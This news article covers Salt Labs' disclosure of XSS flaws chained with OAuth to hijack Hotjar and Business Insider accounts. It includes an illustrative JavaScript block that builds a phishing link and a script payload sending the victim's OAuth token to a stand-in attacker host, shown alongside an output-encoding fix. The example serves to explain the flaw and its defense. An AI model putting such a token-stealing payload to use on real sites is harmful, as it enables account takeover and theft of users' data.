Security researchers have disclosed critical vulnerabilities in web analytics provider Hotjar and global news outlet Business Insider.
The findings, from Salt Labs, point to heightened risk for enterprises. Hotjar, an analytics tool commonly deployed alongside Google Analytics, records extensive personal and sensitive data, including users' on-screen activity, PII, private messages and, in some cases, even credentials.
Potential Impact on Major Brands
Hotjar serves over a million websites, including major brands such as Adobe, Microsoft, T-Mobile and Nintendo. The vulnerabilities could therefore have granted attackers access to sensitive data on a large scale, affecting millions of users and organizations worldwide.
These vulnerabilities are not confined to Hotjar and Business Insider; they point to a broader issue across similar ecosystems. The research, published today, emphasizes the persistence of cross-site scripting (XSS), a class of flaw that has existed since the early days of the web. Although XSS has been progressively mitigated over time, the integration of newer technologies has reintroduced these old flaws and significantly raised the resulting security risk.
Combining XSS With OAuth For Severe Breaches
Salt Labs' research highlights how XSS, when combined with OAuth, can lead to severe breaches. OAuth is the authorization framework behind most social-login flows and is consequently used, often unknowingly, as the de facto authentication mechanism by thousands of web services. By chaining these vulnerabilities, the researchers demonstrated that they could take over Hotjar and Business Insider accounts.
“The risk associated with these types of attacks very naturally depends on the type of target, what information they store, what functionality they provide, etc.,” explained Yaniv Balmas, vice president of research at Salt Security.
“You can generally say that an attacker who successfully exploits this attack vector will gain the same permissions and functionality as the victim, and therefore, the risk will be parallel to what can actually be done by a normal system user.”
Exploitation Method
To exploit this vulnerability, an attacker typically sends a legitimate-looking link via email, text or social media and tricks the victim into clicking it. The link triggers the XSS flaw on the target site, and because the injected script runs in that site's origin it can read the OAuth token or authorization code delivered to the site's login flow. Once the victim clicks, the attacker gains full control of the account, enabling them to perform any action and access all stored data.
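The chain described above, as an added illustration that is not code from Salt Labs, Hotjar or Business Insider: a minimal model of an OAuth client site with a reflected XSS bug, the phishing link that carries the payload, what the injected script can read from an implicit-flow callback, and the same page with output encoding applied. Hostnames, paths, parameter names, the token value and the payload are all constructed for the example and are assumptions, not the real endpoints of either site.

```javascript
// Added example (not Salt Labs', Hotjar's or Business Insider's code).
// Models how one reflected XSS bug on an OAuth client turns a single link
// into token theft, beside the output-encoding fix. Every name below is
// constructed for illustration.

const SITE = "https://client.example";       // assumed vulnerable OAuth client
const ATTACKER = "https://attacker.example"; // assumed attacker-controlled collector

// Escape the characters that change meaning in HTML text and attributes.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: the search term is concatenated straight into the markup, so a
// crafted ?q= value is parsed as HTML (reflected XSS).
function renderSearchVulnerable(q) {
  return `<h1>Results for ${q}</h1>`;
}

// Hardened: the same page, encoding the value at the point of insertion.
function renderSearchSafe(q) {
  return `<h1>Results for ${escapeHtml(q)}</h1>`;
}

// Server-side handler: pull ?q= out of the clicked link and render it.
function serveSearch(linkUrl, renderer) {
  const q = new URL(linkUrl).searchParams.get("q") ?? "";
  return renderer(q);
}

// The injected script. It assumes the identity provider returns the token in
// the callback URL fragment (implicit flow) and that the victim lands on this
// page with that fragment present, e.g. because the provider accepts any path
// on the client's origin as redirect_uri (an assumption for this example).
// location.hash is readable by any script in the origin, injected or not.
const STEAL_TOKEN_PAYLOAD =
  `<script>fetch("${ATTACKER}/c?t=" + encodeURIComponent(location.hash))</script>`;

// The "legitimate-looking link": a real page on the real site, with the
// payload tucked into a query parameter.
function buildPhishingLink(payload) {
  return `${SITE}/search?q=${encodeURIComponent(payload)}`;
}

// What the injected script gets to read: an implicit-flow callback carries
// the bearer token in the fragment, so parsing location.hash yields it.
function parseCallbackFragment(callbackUrl) {
  const hash = new URL(callbackUrl).hash.replace(/^#/, "");
  return Object.fromEntries(new URLSearchParams(hash));
}

// Quick check over rendered output: did the payload survive as live markup?
function containsLiveScript(html) {
  return /<script\b/i.test(html);
}

// Walk through the chain once and return every intermediate value.
function demo() {
  const link = buildPhishingLink(STEAL_TOKEN_PAYLOAD);
  const before = serveSearch(link, renderSearchVulnerable);
  const after = serveSearch(link, renderSearchSafe);
  // Constructed callback URL of the kind a provider would redirect to.
  const token = parseCallbackFragment(
    `${SITE}/search#access_token=ya29.constructed-example&token_type=bearer&state=xyz`
  );
  return {
    link,
    before,
    after,
    token,
    vulnerable: containsLiveScript(before),
    fixed: !containsLiveScript(after),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The fix that matters is `renderSearchSafe`: output encoding removes the XSS, and without a script running in the site's origin the OAuth token is not reachable. Moving from the implicit flow to the authorization code flow with PKCE narrows what a stray script can read, but it does not substitute for eliminating the XSS, since an injected script can still drive the login flow from inside the origin.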
This issue is not isolated to the two analyzed targets. Given OAuth's popularity and how common XSS flaws remain, many other web services are likely to be vulnerable. It underscores the risk that arises when several APIs and protocols are combined without considering how a weakness in one exposes the others.
“As always, when implementing any new technology, many things need to be considered, including, of course, security,” Balmas added. “A solid implementation that considers all possible options should be secure and will not allow an attacker an opportunity to abuse this attack vector.”
The new findings come months after Salt Security revealed critical OAuth vulnerabilities in the AI tool ChatGPT.